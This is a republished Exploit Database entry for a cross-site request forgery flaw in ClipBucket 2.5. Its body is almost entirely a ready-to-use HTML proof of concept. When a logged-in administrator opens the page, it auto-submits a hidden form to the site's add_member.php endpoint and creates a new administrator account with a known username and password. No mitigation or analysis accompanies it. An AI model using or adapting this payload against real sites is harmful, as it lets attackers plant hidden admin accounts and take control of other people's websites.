Clipbucket 2.5 – Cross-Site Request Forgery

• Exploit Database
• 15 阅读

• 作者： DaOne
  日期： 2012-08-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20666/

• ##########################################
  [~] Exploit Title: ClipBucket 2.5 CSRF Vulnerability
  [~] Author: DaOne [LCA]
  [~] Date: 15/8/2012
  [~] Software Link: http://clip-bucket.com/
  [~] Or: http://sourceforge.net/projects/clipbucket/
  ##########################################
  
  [#] [ CSRF Add Admin ]
  
  <html>
  <body onload="document.form0.submit();">
  <form method="POST" name="form0" action="http://[target]/admin_area/add_member.php">
  <input type="hidden" name="username" value="webadmin"/>
  <input type="hidden" name="email" value="admin@email.com"/>
  <input type="hidden" name="password" value="pass123"/>
  <input type="hidden" name="cpassword" value="pass123"/>
  <input type="hidden" name="country" value="CA"/>
  <input type="hidden" name="gender" value="Male"/>
  <input type="hidden" name="dob" value="1989-10-14"/>
  <input type="hidden" name="category" value="1"/>
  <input type="hidden" name="level" value="1"/>
  <input type="hidden" name="active" value="Ok"/>
  <input type="hidden" name="add_member" value="Add Member"/>
  </form>
  </body>
  </html>
  
  ##########################################
  [*] thanks to : * Ly.Lolsec *
  ##########################################